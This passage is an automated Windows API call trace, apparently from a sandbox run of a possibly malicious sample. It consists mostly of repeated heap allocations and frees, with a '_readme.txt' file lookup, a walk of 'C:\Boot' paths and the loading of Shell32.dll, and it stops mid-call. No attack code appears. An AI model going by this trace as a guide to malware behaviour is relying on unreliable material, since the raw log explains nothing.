ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.122] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.123] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.130] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0056.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.130] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.130] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.130] PathFindFileNameW (pszPath="") returned="" [0056.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.130] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.131] GetProcAddress (hModule=0x75fd0000, 